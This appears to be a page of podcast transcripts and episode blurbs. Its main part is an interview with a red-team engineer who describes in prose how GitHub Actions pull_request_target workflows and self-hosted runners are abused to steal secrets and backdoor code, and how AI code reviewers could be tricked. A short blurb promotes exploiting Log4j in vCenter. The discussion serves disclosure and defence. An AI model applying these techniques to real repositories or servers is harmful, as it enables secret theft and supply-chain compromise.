you know, a transactional, likeChristoph said, it's not just, you're not just going and selling something and then moving on to the next new logo, right? We're, we truly are getting entrenched into that organization and becoming an extension of their team. So- – So let's talk, Brandon, let's talk an example here. What I like to get into this part of it really is, let's talk about, you know, what kind of environment you walked into. And what I really liked to hear is, was it really what you were told it would be or what you thought it would be? When you really got into it, what did you find? What was the problem? What was the technology? And then ultimately what was the problem that you solved? How did you do it? What kind of tech did you put in? And you know, what was the outcome of all that? – Sure. Well, we can talk about, let's see, here's a good example. We talk about relationships, things of that nature. I had a really good friend who I went to CrossFit with. You know, he was in IT, never worked with him when he was in IT and I was on the sales side. When he landed as a COO at this new organization, you know, I reached out to him and said, “Hey, this is what I'm doing.” And he kind of had the same of their conversations. He's like, “You know, I've worked with guys like you before. “Or, you know, I've worked with a big bar “or something of that nature.” And I was like, “Let's just run a process. “Let's do some evaluations. “Let's see if it proves out value. “If it doesn't, you know, we'll go from there.” So he made an introduction to the director of IT who's essentially the person that I needed to work with. Once we got into it, he was very apprehensive as well. He was like, “Well, why do we need “to evaluate these things? “I already did this two years ago “and we found all these different problems, right?” And so, like Christoph mentioned earlier, we start at the cloud and cybersecurity. That's kind of where we start. This is where our focus is. First of all, the differentiates us in the market. Second of all, I don't think a lot of people are kind of leading with those conversations. And so he said, “That's fine. “Like, we could go through this exercise.” I mean, I think he thought he already had this buttoned up, right? So they were in Colo. They're a SaaS company. They've had outages. They had security vulnerabilities. They have a small IT team. They essentially have no care and feeding of that environment. Or if they do, they're focusing a big portion of their time during that time on it when they can't focus on growing the SaaS company, right? There's just a plethora of challenges that they were seeing. And then cost was a big factor. And essentially, because he went out to market and he doesn't know what fair market values are and a lot of the times when you get that first quote or depending on what provider you go to or what specifically if you didn't establish that baseline really well, like you can't just go get a snapshot of vCenter and take it out to market. That's not a good process, right? So once we kind of peeled back the onion and we understood all the different dynamics that go into it, you know, he said, “Okay, well, I think you can definitely drive this “to more of a private cloud environment. “They're more cost economic from that perspective “than go into a public cloud. “Plus you need an extension of your team “based on your team size and all these things.” And so we started extrapolating that and figuring out which workloads need to be highly available, have DR associated with them because of different compliance agreements and things that are in place. So they still kept something in Colo, actually. They have one or two racks now from what they currently had, but they moved the other 89 servers into a cloud environment and started leveraging a major service provider that's part of the Telarus ecosystem. They're a phenomenal group. We've had great success with them. And, you know, at the end of the day, it's very transformational from a couple things, at least from an executive perspective. Now they don't have reputation. Some of their clients are very large clients, you know, household names, if you will. So no more outages, right? They're highly available. It's transformed their reputation from that perspective. They've actually layered on that some of their talk tracks about how this technology enables their end clients, right? So they sell a SaaS platform. It's a POS. Their consumers are buying it. This is how you can scale. This is how we can make the overall buying experience for your clients better, right? So, you know, all of these things have truly transitioned their business from IT being a cost center to IT providing value to their overall organization and their inclines, right? So I would say that's where we get excited about transformational. Usually it's not flipping, you know, from one sin to a different sin. That's not usually a transformational change. It's how is it enabling or driving that business forward? And there's a lot of other use cases or applicable things that probably came out of that deal, but I would say that's a good high level.Christoph were you gonna mention something? – No, nothing other than, you know, I think that was a really good example of, you know, a small IT team that needed help, needed direction, needed Brandon's guidance. You know, they hadn't gone out to market and looked at this for years. And so, you know, having Brandon as an extension, I think it was eyeopening around what is evolved in the market, what's available to them. And yeah, it was just a really fun project to see and be a part of. – It is always interesting when you, you know, from an engineering perspective, we always go in and say, what do you need? What do you need it to do? What's the problem that it needs to solve? And then when we ask that question of, okay, but if you could do this, if you could evolve your application, if you could go do this, your competitors are doing this, if you could do something like that or, you know, have a leg up, would that be game changing for you? And I think you get them to think differently because sometimes they just think, I'm just never gonna get to that, or I don't know that it's possible. Or to your point, you know, we looked at it two years ago and it wasn't possible. How much changes in this industry in two years, right? With all of the tech and everything flooding into here. So yeah, I love hearing a good transformational story because yeah, you brought it up and you nailed it where IT's not a cost center, right? IT has the power to change the business and change the company. So awesome story. – Yeah. – All right,Christoph I need you to wrap us up, take us home, man. I want to hear, you know, if I'm a partner that's listening to this and maybe I haven't ventured as deep into cloud or into security, and we talked about kind of where you started, we talked about some of the difficulties that you guys have been through in these conversations, but maybe just talk to me about people that aren't comfortable with this or haven't stepped into it. What's your advice? What are you recommending in that, right? Because not just for now, but as this continues to evolve in the future. – Sure. Yeah, I mean, honestly, I think I'd take a step back and come to the realization that this isn't that complicated, right? Like don't get too caught up in the technology. Don't learn about every single EDR solution or every single cloud solution or every single infrastructure solution. Just have conversations with the business team and leaders within an organization. Get to know their team, get to know, I said this earlier, but I mean, I think it's a super important point. Get to know what are the skill sets? How big is the team? You know, where are the gaps that you have, whether it's infrastructure, security, network, you know, database, it doesn't matter. Just get to know like, where are the gaps? I mentioned it earlier, but this idea of the great resignation, this thing is real. Like people are struggling to find people. And do you know where most of these people are? They're at providers and they're at providers because they're super smart. Not that, you know, the people down in the trenches aren't, but they're really good, highly skilled professionals that want to work with hundreds of different customers and have unique challenges every single day to solve. They're not working for one company. And because those guys are typically getting kind of bored. And so get to know the company, get to know their challenges, understand, you know, what are they looking to accomplish? Where are they looking to go? What are their core competencies? And how can you bring solutions and ideas to the table that free them up to focus on those core competencies? You know, that's really it. Talk about the business. Get to know what their ideal outcomes are and generally positive, good opportunities of ways that you can assist, you know, come right out of that. And lastly, I'm preaching to the choir, but lean into Telarus, right? Like get to know the team, get to know the channel managers, get to know the engineering team. You know, we greatly appreciate the support that, you know, you folks have brought to us as an extension of our team. You know, we can't be experts on every single technology. We can't be experts on every single conversation. And just knowing that, you know, we can bounce ideas off you. You don't even have to be on every customer call or any customer calls for that matter. But just being a soundboard to us, as we work through just different, you know, talk tracks internally, you know, we just want to say, we're grateful to, you know, you and your team, Josh, you guys have been great. And yeah, that's my very basic advice for somebody to just dive in. – I love it. You brought up a good point. I was reading a stat last night that makes this a math problem, right? That the title of this podcast is how in the world are we going to ever solve for this whole talent shortage in tech and, you know, starting before the great resignation, now it's just gotten ultimately so much worse. But from a security perspective, right? We talk about the great security certification, the CISSP, of it gives us a great holistic view on how security impacts the business. It's not just technology. It focuses on all these different domains. There are roughly 90 to 100,000 certified CISSPs in the United States. And there are 20 to 30,000 job openings that require a CISSP. Now I'm not a math expert here, but to your point where that talent is, we know where that talent is, and it's at that supplier side. You guys are dead on. I think you guys are out there. You're crushing it, recognizing that this is where the talent is. And you guys have done a phenomenal job of mapping all that and appreciate the kind words. Just appreciate the opportunity to work with you guys. So no, it's been awesome and we're excited to continue with this go. So Christoph I appreciate you bringing us home and thanks so much for coming on today, man. – Josh, thanks for having us. We had a great time and look forward to doing this again in the future. – Brandon, you as well, appreciate you coming on. Thanks. I know you guys got a lot going on. So thanks again for spending time with me, man. – Hey, Josh. – Okay. All right, everybody, that wraps us up. I'm your host, Josh Lupresto, SVP of Sales Engineering at Telarus and this is Next Level BizTech.
Adnan Khan, Lead Security Engineer at Praetorian, joins Corey on Screaming in the Cloud to discuss software bill of materials and supply chain attacks. Adnan describes how simple pull requests can lead to major security breaches, and how to best avoid those vulnerabilities. Adnan and Corey also discuss the rapid innovation at Github Actions, and the pros and cons of having new features added so quickly when it comes to security. Adnan also discusses his view on the state of AI and its impact on cloud security. About AdnanAdnan is a Lead Security Engineer at Praetorian. He is responsible for executing on Red-Team Engagements as well as developing novel attack tooling in order to meet and exceed engagement objectives and provide maximum value for clients.His past experience as a software engineer gives him a deep understanding of where developers are likely to make mistakes, and has applied this knowledge to become an expert in attacks on organization's CI/CD systems.Links Referenced: Praetorian: https://www.praetorian.com/ Twitter: https://twitter.com/adnanthekhan Praetorian blog posts: https://www.praetorian.com/author/adnan-khan/ TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Are you navigating the complex web of API management, microservices, and Kubernetes in your organization? Solo.io is here to be your guide to connectivity in the cloud-native universe!Solo.io, the powerhouse behind Istio, is revolutionizing cloud-native application networking. They brought you Gloo Gateway, the lightweight and ultra-fast gateway built for modern API management, and Gloo Mesh Core, a necessary step to secure, support, and operate your Istio environment.Why struggle with the nuts and bolts of infrastructure when you can focus on what truly matters - your application. Solo.io's got your back with networking for applications, not infrastructure. Embrace zero trust security, GitOps automation, and seamless multi-cloud networking, all with Solo.io.And here's the real game-changer: a common interface for every connection, in every direction, all with one API. It's the future of connectivity, and it's called Gloo by Solo.io.DevOps and Platform Engineers, your journey to a seamless cloud-native experience starts here. Visit solo.io/screaminginthecloud today and level up your networking game.Corey: As hybrid cloud computing becomes more pervasive, IT organizations need an automation platform that spans networks, clouds, and services—while helping deliver on key business objectives. Red Hat Ansible Automation Platform provides smart, scalable, sharable automation that can take you from zero to automation in minutes. Find it in the AWS Marketplace.Corey: Welcome to Screaming in the Cloud, I'm Corey Quinn. I've been studiously ignoring a number of buzzword, hype-y topics, and it's probably time that I addressed some of them. One that I've been largely ignoring, mostly because of its prevalence at Expo Hall booths at RSA and other places, has been software bill of materials and supply chain attacks. Finally, I figured I would indulge the topic. Today I'm speaking with Adnan Khan, lead security engineer at Praetorian. Adnan, thank you for joining me.Adnan: Thank you so much for having me.Corey: So, I'm trying to understand, on some level, where the idea of these SBOM or bill-of-material attacks have—where they start and where they stop. I've seen it as far as upstream dependencies have a vulnerability. Great. I've seen misconfigurations in how companies wind up configuring their open-source presences. There have been a bunch of different, it feels almost like orthogonal concepts to my mind, lumped together as this is a big scary thing because if we have a big single scary thing we can point at, that unlocks budget. Am I being overly cynical on this or is there more to it?Adnan: I'd say there's a lot more to it. And there's a couple of components here. So first, you have the SBOM-type approach to security where organizations are looking at which packages are incorporated into their builds. And vulnerabilities can come out in a number of ways. So, you could have software actually have bugs or you could have malicious actors actually insert backdoors into software.I want to talk more about that second point. How do malicious actors actually insert backdoors? Sometimes it's compromising a developer. Sometimes it's compromising credentials to push packages to a repository, but other times, it could be as simple as just making a pull request on GitHub. And that's somewhere where I've spent a bit of time doing research, building off of techniques that other people have documented, and also trying out some attacks for myself against two Microsoft repositories and several others that have reported over the last few months that would have been able to allow an attacker to slip a backdoor into code and expand the number of projects that they are able to attack beyond that.Corey: I think one of the areas that we've seen a lot of this coming from has been the GitHub Action space. And I'll confess that I wasn't aware of a few edge-case behaviors around this. Most of my experience with client-side Git configuration in the .git repository—pre-commit hooks being a great example—intentionally and by design from a security perspective, do not convey when you check that code in and push it somewhere, or grab someone else's, which is probably for the best because otherwise, it's, “Oh yeah, just go ahead and copy your password hash file and email that to something else via a series of arcane shell script stuff.” The vector is there. I was unpleasantly surprised somewhat recently to discover that when I cloned a public project and started running it locally and then adding it to my own fork, that it would attempt to invoke a whole bunch of GitHub Actions flows that I'd never, you know, allowed it to do. That was… let's say, eye-opening.Adnan: [laugh]. Yeah. So, on the particular topic of GitHub Actions, the pull request as an attack vector, like, there's a lot of different forms that an attack can take. So, one of the more common ones—and this is something that's been around for just about as long as GitHub Actions has been around—and this is a certain trigger called ‘pull request target.' What this means is that when someone makes a pull request against the base repository, maybe a branch within the base repository such as main, that will be the workflow trigger.And from a security's perspective, when it runs on that trigger, it does not require approval at all. And that's something that a lot of people don't really realize when they're configuring their workflows. Because normally, when you have a pull request trigger, the maintainer can check a box that says, “Oh, require approval for all external pull requests.” And they think, “Great, everything needs to be approved.” If someone tries to add malicious code to run that's on the pull request target trigger, then they can look at the code before it runs and they're fine.But in a pull request target trigger, there is no approval and there's no way to require an approval, except for configuring the workflow securely. So, in this case, what happens is, and in one particular case against the Microsoft repository, this was a Microsoft reusable GitHub Action called GPT Review. It was vulnerable because it checked out code from my branch—so if I made a pull request, it checked out code from my branch, and you could find this by looking at the workflow—and then it ran tests on my branch, so it's running my code. So, by modifying the entry points, I could run code that runs in the context of that base branch and steal secrets from it, and use those to perform malicious Actions.Corey: Got you. It feels like historically, one of the big threat models around things like this is al—[and when 00:06:02] you have any sort of CI/CD exploit—is either falls down one of two branches: it's either the getting secret access so you can leverage those credentials to pivot into other things—I've seen a lot of that in the AWS space—or more boringly, and more commonly in many cases, it seems to be oh, how do I get it to run this crypto miner nonsense thing, with the somewhat large-scale collapse of crypto across the board, it's been convenient to see that be less prevalent, but still there. Just because you're not making as much money means that you'll still just have to do more of it when it's all in someone else's account. So, I guess it's easier to see and detect a lot of the exploits that require a whole bunch of compute power. The, oh by the way, we stole your secrets and now we're going to use that to lateral into an organization seem like it's something far more… I guess, dangerous and also sneaky.Adnan: Yeah, absolutely. And you hit the nail on the head there with sneaky because when I first demonstrated this, I made a test account, I created a PR, I made a couple of Actions such as I modified the name of the release for the repository, I just put a little tag on it, and didn't do any other changes. And then I also created a feature branch in one of Microsoft's repositories. I don't have permission to do that. That just sat there for about almost two weeks and then someone else exploited it and then they responded to it.So, sneaky is exactly the word you could describe something like this. And another reason why it's concerning is, beyond the secret disclosure for—and in this case, the repository only had an OpenAI API key, so… okay, you can talk to ChatGPT for free. But this was itself a Github Action and it was used by another Microsoft machine-learning project that had a lot more users, called SynapseML, I believe was the name of the other project. So, what someone could do is backdoor this Action by creating a commit in a feature branch, which they can do by stealing the built-in GitHub token—and this is something that all Github Action runs have; the permissions for it vary, but in this case, it had the right permissions—attacker could create a new branch, modify code in that branch, and then modify the tag, which in Git, tags are mutable, so you can just change the commit the tag points to, and now, every time that other Microsoft repository runs GPT Review to review a pull request, it's running attacker-controlled code, and then that could potentially backdoor that other repository, steal secrets from that repository.So that's, you know, one of the scary parts of, in particular backdooring a Github Action. And I believe there was a very informative Blackhat talk this year, that someone from—I'm forgetting the name of the author, but it was a very good watch about how Actions vulnerabilities can be vulnerable, and this is kind of an example of—it just happened to be that this was an Action as well.Corey: That feels like this is an area of exploit that is becoming increasingly common. I tie it almost directly to the rise of GitHub Actions as the default CI/CD system that a lot of folks have been using. For the longest time, it seemed like a poorly configured Jenkins box hanging out somewhere in your environment that was the exception to the Infrastructure as Code rule because everyone has access to it, configures it by hand, and invariably it has access to production was the way that people would exploit things. For a while, you had CircleCI and Travis-CI, before Travis imploded and Circle did a bunch of layoffs. Who knows where they're at these days?But it does seem that the common point now has been GitHub Actions, and a .github folder within that Git repo with a workflows YAML file effectively means that a whole bunch of stuff can happen that you might not be fully aware of when you're cloning or following along with someone's tutorial somewhere. That has caught me out in a couple of strange ways, but nothing disastrous because I do believe in realistic security boundaries. I just worry how much of this is the emerging factor of having a de facto standard around this versus something that Microsoft has actively gotten wrong. What's your take on it?Adnan: Yeah. So, my take here is that Github could absolutely be doing a lot more to help prevent users from shooting themselves in the foot. Because their documentation is very clear and quite frankly, very good, but people aren't warned when they make certain configuration settings in their workflows. I mean, GitHub will happily take the settings and, you know, they hit commit, and now the workflow could be vulnerable. There's no automatic linting of workflows, or a little suggestion box popping up like, “Hey, are you sure you want to configure it this way?”The technology to detect that is there. There's a lot of third-party utilities that will lint Actions workflows. Heck, for looking for a lot of these pull request target-type vulnerabilities, I use a Github code search query. It's just a regular expression. So, having something that at least nudges users to not make that mistake would go really far in helping people not make these mista—you know, adding vulnerabilities to their projects.Corey: It seems like there's also been issues around the GitHub Actions integration approach where OICD has not been scoped correctly a bunch of times. I've seen a number of articles come across my desk in that context and fortunately, when I wound up passing out the ability for one of my workflows to deploy to my AWS account, I got it right because I had no idea what I was doing and carefully followed the instructions. But I can totally see overlooking that one additional parameter that leaves things just wide open for disaster.Adnan: Yeah, absolutely. That's one where I haven't spent too much time actually looking for that myself, but I've definitely read those articles that you mentioned, and yeah, it's very easy for someone to make that mistake, just like, it's easy for someone to just misconfigure their Action in general. Because in some of the cases where I found vulnerabilities, there would actually be a commit saying, “Hey, I'm making this change because the Action needs access to these certain secrets. And oh, by the way, I need to update the checkout steps so it actually checks out the PR head so that it's [testing 00:12:14] that PR code.” Like, people are actively making a decision to make it vulnerable because they don't realize the implication of what they've just done.And in the second Microsoft repository that I found the bug in, was called Microsoft Confidential Sidecar Containers. That repository, the developer a week prior to me identifying the bug made a commit saying that we're making a change and it's okay because it requires approval. Well, it doesn't because it's a pull request target.Corey: Part of me wonders how much of this is endemic to open-source as envisioned through enterprises versus my world of open-source, which is just eh, I've got this weird side project in my spare time, and it seemed like it might be useful to someone else, so I'll go ahead and throw it up there. I understand that there's been an awful lot of commercialization of open-source in recent years; I'm not blind to that fact, but it also seems like there's a lot of companies playing very fast and loose with things that they probably shouldn't be since they, you know, have more of a security apparatus than any random contributors standing up a clone of something somewhere will.Adnan: Yeah, we're definitely seeing this a lot in the machine-learning space because of companies that are trying to move so quickly with trying to build things because OpenAI AI has blown up quite a bit recently, everyone's trying to get a piece of that machine learning pie, so to speak. And another thing of what you're seeing is, people are deploying self-hosted runners with Nvidia, what is it, the A100, or—it's some graphics card that's, like, $40,000 apiece attached to runners for running integration tests on machine-learning workflows. And someone could, via a pull request, also just run code on those and mine crypto.Corey: I kind of miss the days when exploiting computers is basically just a way for people to prove how clever they were or once in a blue moon come up with something innovative. Now, it's like, well, we've gone all around the mulberry bush just so we can basically make computers solve a sudoku form, and in return, turn that into money down the road. It's frustrating, to put it gently.Adnan: [laugh].Corey: When you take a look across the board at what companies are doing and how they're embracing the emerging capabilities inherent to these technologies, how do you avoid becoming a cautionary tale in the space?Adnan: So, on the flip side of companies having vulnerable workflows, I've also seen a lot of very elegant ways of writing secure workflows. And some of the repositories are using deployment environments—which is the GitHub Actions feature—to enforce approval checks. So, workflows that do need to run on pull request target because of the need to access secrets for pull requests will have a step that requires a deployment environment to complete, and that deployment environment is just an approval and it doesn't do anything. So essentially, someone who has permissions to the repository will go in, approve that environment check, and only then will the workflow continue. So, that adds mandatory approvals to pull requests where otherwise they would just run without approval.And this is on, particularly, the pull request target trigger. Another approach is making it so the trigger is only running on the label event and then having a maintainer add a label so the tests can run and then remove the label. So, that's another approach where companies are figuring out ways to write secure workflows and not leave their repositories vulnerable.Corey: It feels like every time I turn around, Github Actions has gotten more capable. And I'm not trying to disparage the product; it's kind of the idea of what we want. But it also means that there's certainly not an awareness in the larger community of how these things can go awry that has kept up with the pace of feature innovation. How do you balance this without becoming the Department of No?Adnan: [laugh]. Yeah, so it's a complex issue. I think GitHub has evolved a lot over the years. Actions, it's—despite some of the security issues that happen because people don't configure them properly—is a very powerful product. For a CI/CD system to work at the scale it does and allow so many repositories to work and integrate with everything else, it's really easy to use. So, it's definitely something you don't want to take away or have an organization move away from something like that because they are worried about the security risks.When you have features coming in so quickly, I think it's important to have a base, kind of like, a mandatory reading. Like, if you're a developer that writes and maintains an open-source software, go read through this document so you can understand the do's and don'ts instead of it being a patchwork where some people, they take a good security approach and write secure workflows and some people just kind of stumble through Stack Overflow, find what works, messes around with it until their deployment is working and their CI/CD is working and they get the green checkmark, and then they move on to their never-ending list of tasks that—because they're always working on a deadline.Corey: Reminds me of a project I saw a few years ago when it came out that Volkswagen had been lying to regulators. It was a framework someone built called ‘Volkswagen' that would detect if it was running inside of a CI/CD environment, and if so, it would automatically make all the tests pass. I have a certain affinity for projects like that. Another one was a tool that would intentionally degrade the performance of a network connection so you could simulate having a latent or stuttering connection with packet loss, and they call that ‘Comcast.' Same story. I just thought that it's fun seeing people get clever on things like that.Adnan: Yeah, absolutely.Corey: When you take a look now at the larger stories that are emerging in the space right now, I see an awful lot of discussion coming up that ties to SBOMs and understanding where all of the components of your software come from. But I chased some stuff down for fun once, and I gave up after 12 dependency leaps from just random open-source frameworks. I mean, I see the Dependabot problem that this causes as well, where whenever I put something on GitHub and then don't touch it for a couple of months—because that's how I roll—I come back and there's a whole bunch of terrifyingly critical updates that it's warning me about, but given the nature of how these things get used, it's never going to impact anything that I'm currently running. So, I've learned to tune it out and just ignore it when it comes in, which is probably the worst of all possible approaches. Now, if I worked at a bank, I should probably take a different perspective on this, but I don't.Adnan: Mm-hm. Yeah. And that's kind of a problem you see, not just with SBOMs. It's just security alerting in general, where anytime you have some sort of signal and people who are supposed to respond to it are getting too much of it, you just start to tune all of it out. It's like that human element that applies to so much in cybersecurity.And I think for the particular SBOM problem, where, yeah, you're correct, like, a lot of it… you don't have reachability because you're using a library for one particular function and that's it. And this is somewhere where I'm not that much of an expert in where doing more static source analysis and reachability testing, but I'm certain there are products and tools that offer that feature to actually prioritize SBOM-based alerts based on actual reachability versus just having an as a dependency or not.[midroll 00:20:00]Corey: I feel like, on some level, wanting people to be more cautious about what they're doing is almost shouting into the void because I'm one of the only folks I found that has made the assertion that oh yeah, companies don't actually care about security. Yes, they email you all the time after they failed to protect your security, telling you how much they care about security, but when you look at where they invest, feature velocity always seems to outpace investment in security approaches. And take a look right now at the hype we're seeing across the board when it comes to generative AI. People are excited about the capabilities and security is a distant afterthought around an awful lot of these things. I don't know how you drive a broader awareness of this in a way that sticks, but clearly, we haven't collectively found it yet.Adnan: Yeah, it's definitely a concern. When you see things on—like for example, you can look at Github's roadmap, and there's, like, a feature there that's, oh, automatic AI-based pull request handling. Okay, so does that mean one day, you'll have a GitHub-powered LLM just approve PRs based on whether it determines that it's a good improvement or not? Like, obviously, that's not something that's the case now, but looking forward to maybe five, six years in the future, in the pursuit of that ever-increasing velocity, could you ever have a situation where actual code contributions are reviewed fully by AI and then approved and merged? Like yeah, that's scary because now you have a threat actor that could potentially specifically tailor contributions to trick the AI into thinking they're great, but then it could turn around and be a backdoor that's being added to the code.Obviously, that's very far in the future and I'm sure a lot of things will happen before that, but it starts to make you wonder, like, if things are heading that way. Or will people realize that you need to look at security at every step of the way instead of just thinking that these newer AI systems can just handle everything?Corey: Let's pivot a little bit and talk about your day job. You're a lead security engineer at what I believe to be a security-focused consultancy. Or—Adnan: Yeah.Corey: If you're not a SaaS product. Everything seems to become a SaaS product in the fullness of time. What's your day job look like?Adnan: Yeah, so I'm a security engineer on Praetorian's red team. And my day-to-day, I'll kind of switch between application security and red-teaming. And that kind of gives me the opportunity to, kind of, test out newer things out in the field, but then also go and do more traditional application security assessments and code reviews, and reverse engineering to kind of break up the pace of work. Because red-teaming can be very fast and fast-paced and exciting, but sometimes, you know, that can lead to some pretty late nights. But that's just the nature of being on a red team [laugh].Corey: It feels like as soon as I get into the security space and start talking to cloud companies, they get a lot more defensive than when I'm making fun of, you know, bad service naming or APIs that don't make a whole lot of sense. It feels like companies have a certain sensitivity around the security space that applies to almost nothing else. Do you find, as a result, that a lot of the times when you're having conversations with companies and they figure out that, oh, you're a red team for a security researcher, oh, suddenly, we're not going to talk to you the way we otherwise might. We thought you were a customer, but nope, you can just go away now.Adnan: [laugh]. I personally haven't had that experience with cloud companies. I don't know if I've really tried to buy a lot. You know, I'm… if I ever buy some infrastructure from cloud companies as an individual, I just kind of sign up and put in my credit card. And, you know, they just, like, oh—you know, they just take my money. So, I don't really think I haven't really, personally run into anything like that yet [laugh].Corey: Yeah, I'm curious to know how that winds up playing out in some of these, I guess, more strategic, larger company environments. I don't get to see that because I'm basically a tiny company that dabbles in security whenever I stumble across something, but it's not my primary function. I just worry on some level one of these days, I'm going to wind up accidentally dropping a zero-day on Twitter or something like that, and suddenly, everyone's going to come after me with the knives. I feel like [laugh] at some point, it's just going to be a matter of time.Adnan: Yeah. I think when it comes to disclosing things and talking about techniques, the key thing here is that a lot of the things that I'm talking about, a lot of the things that I'll be talking about in some blog posts that have coming out, this is stuff that these companies are seeing themselves. Like, they recognize that these are security issues that people are introducing into code. They encourage people to not make these mistakes, but when it's buried in four links deep of documentation and developers are tight on time and aren't digging through their security documentation, they're just looking at what works, getting it to work and moving on, that's where the issue is. So, you know, from a perspective of raising awareness, I don't feel bad if I'm talking about something that the company itself agrees is a problem. It's just a lot of the times, their own engineers don't follow their own recommendations.Corey: Yeah, I have opinions on these things and unfortunately, it feels like I tend to learn them in some of the more unfortunate ways of, oh, yeah, I really shouldn't care about this thing, but I only learned what the norm is after I've already done something. This is, I think, the problem inherent to being small and independent the way that I tend to be. We don't have enough people here for there to be a dedicated red team and research environment, for example. Like, I tend to bleed over a little bit into a whole bunch of different things. We'll find out. So far, I've managed to avoid getting it too terribly wrong, but I'm sure it's just a matter of time.So, one area that I think seems to be a way that people try to avoid cloud issues is oh, I read about that in the last in-flight magazine that I had in front of me, and the cloud is super insecure, so we're going to get around all that by running our own infrastructure ourselves, from either a CI/CD perspective or something else. Does that work when it comes to this sort of problem?Adnan: Yeah, glad you asked about that. So, we've also seen open-s—companies that have large open-source presence on GitHub just opt to have self-hosted Github Actions runners, and that opens up a whole different Pandora's box of attacks that an attacker could take advantage of, and it's only there because they're using that kind of runner. So, the default GitHub Actions runner, it's just an agent that runs on a machine, it checks in with GitHub Actions, it pulls down builds, runs them, and then it waits for another build. So, these are—the default state is a non-ephemeral runner with the ability to fork off tasks that can run in the background. So, when you have a public repository that has a self-hosted runner attached to it, it could be at the organization level or it could be at the repository level.What an attacker can just do is create a pull request, modify the pull request to run on a self-hosted runner, write whatever they want in the pull request workflow, create a pull request, and now as long as they were a previous contributor, meaning you fixed a typo, you… that could be a such a, you know, a single character typo change could even cause that, or made a small contribution, now they create the pull request. The arbitrary job that they wrote is now picked up by that self-hosted runner. They can fork off it, process it to run in the background, and then that just continues to run, the job finishes, their pull request, they'll just—they close it. Business as usual, but now they've got an implant on the self-hosted runner. And if the runners are non-ephemeral, it's very hard to completely lock that down.And that's something that I've seen, there's quite a bit of that on GitHub where—and you can identify it just by looking at the run logs. And that's kind of comes from people saying, “Oh, let's just self-host our runners,” but they also don't configure that properly. And that opens them up to not only tampering with their repositories, stealing secrets, but now depending on where your runner is, now you potentially could be giving an attacker a foothold in your cloud environment.Corey: Yeah, that seems like it's generally a bad thing. I found that cloud tends to be more secure than running it yourself in almost every case, with the exception that once someone finds a way to break into it, there's suddenly a lot more eggs in a very large, albeit more secure, basket. So, it feels like it's a consistent trade-off. But as time goes on, it feels like it is less and less defensible, I think, to wind up picking out an on-prem strategy from a pure security point of view. I mean, there are reasons to do it. I'm just not sure.Adnan: Yeah. And I think that distinction to be made there, in particular with CI/CD runners is there's cloud, meaning you let your—there's, like, full cloud meaning you let your CI/CD provider host your infrastructure as well; there's kind of that hybrid approach you mentioned, where you're using a CI/CD provider, but then you're bringing your own cloud infrastructure that you think you could secure better; or you have your runners sitting in vCenter in your own data center. And all of those could end up being—both having a runner in your cloud and in your data center could be equally vulnerable if you're not segmenting builds properly. And that's the core issue that happens when you have a self-hosted runner is if they're not ephemeral, it's very hard to cut off all attack paths. There's always something an attacker can do to tamper with another build that'll have some kind of security impact. You need to just completely isolate your builds and that's essentially what you see in a lot of these newer guidances like the [unintelligible 00:30:04] framework, that's kind of the core recommendation of it is, like, one build, one clean runner.Corey: Yeah, that seems to be the common wisdom. I've been doing a lot of work with my own self-hosted runners that run inside of Lambda. Definitionally those are, of course, ephemeral. And there's a state machine that winds up handling that and screams bloody murder if there's a problem with it. So far, crossing fingers hoping it works out well.And I have a bounded to a very limited series of role permissions, and of course, its own account of constraint blast radius. But there's still—there are no guarantees in this. The reason I build it the way I do is that, all right, worst case someone can get access to this. The only thing they're going to have the ability to do is, frankly, run up my AWS bill, which is an area I have some small amount of experience with.Adnan: [laugh]. Yeah, yeah, that's always kind of the core thing where if you get into someone's cloud, like, well, just sit there and use their compute resources [laugh].Corey: Exactly. I kind of miss when that was the worst failure mode you had for these things.Adnan: [laugh].Corey: I really want to thank you for taking the time to speak with me today. If people want to learn more, where's the best place for them to find you?Adnan: I do have a Twitter account. Well, I guess you can call it Twitter anymore, but, uh—Corey: Watch me. Sure I can.Adnan: [laugh]. Yeah, so I'm on Twitter, and it's @adnanthekhan. So, it's like my first name with ‘the' and then K-H-A-N because, you know, my full name probably got taken up, like, years before I ever made a Twitter account. So, occasionally I tweet about GitHub Actions there.And on Praetorian's website, I've got a couple of blog posts. I have one—the one that really goes in-depth talking about the two Microsoft repository pull request attacks, and a couple other ones that are disclosed, will hopefully drop on the twenty—what is that, Tuesday? That's going to be the… that's the 26th. So, it should be airing on the Praetorian blog then. So, if you—Corey: Excellent. It should be out by the time this is published, so we will, of course, put a link to that in the [show notes 00:32:01]. Thank you so much for taking the time to speak with me today. I appreciate it.Adnan: Likewise. Thank you so much, Corey.Corey: Adnan Khan, lead security engineer at Praetorian. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice, along with an insulting comment that's probably going to be because your podcast platform of choice is somehow GitHub Actions.Adnan: [laugh].Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.
Oooo, giggidy! Today's tale of pentest pwnage is about pwning vCenter with CVE-2021-44228 - a vulnerability that lets us bypass authentication entirely and do/take what we want from vCenter! Key links to make the magic happen: How to exploit log4j manually in vCenter How to automate the attack! Tool to steal the SAML database you extract from vCenter
!!WARNING: DEEP SYSADMIN CUTS AHEAD!! Back in the early 2000s, if you were a sysadmin that had to set up desktops or servers, you probably used Norton Ghost to create images. When virtualization became big, that process moved to creating VM templates. But there was still often a lot of manual intervention in these tasks - password setting, BIOS updates, vCenter installations and more. As the IT world moves more and more towards automating software tasks, what about automating infrastructure provisioning? Sure, there's cloud, but what if you're still on-prem? This week, Rob Hirschfeld of RackN joins us to discuss how RackN helps automate the previously un-automate-able.
On this week's episode of the podcast I cover info on some new features coming to Windows 11, some new Azure services, details of new versions of ESXi and vCenter plus more! Reference Links: https://www.rorymon.com/blog/two-chrome-patches-in-5-days-mac-ransomware-cio-fined-for-failed-migration/
Rich and Branden are pretty big fanboys of #vmware #esxi, and this podcast is about ESXi and vCenter. Visit our website here: https://2guystek.tv/ for all things 2GT! And thank you so much for listening!
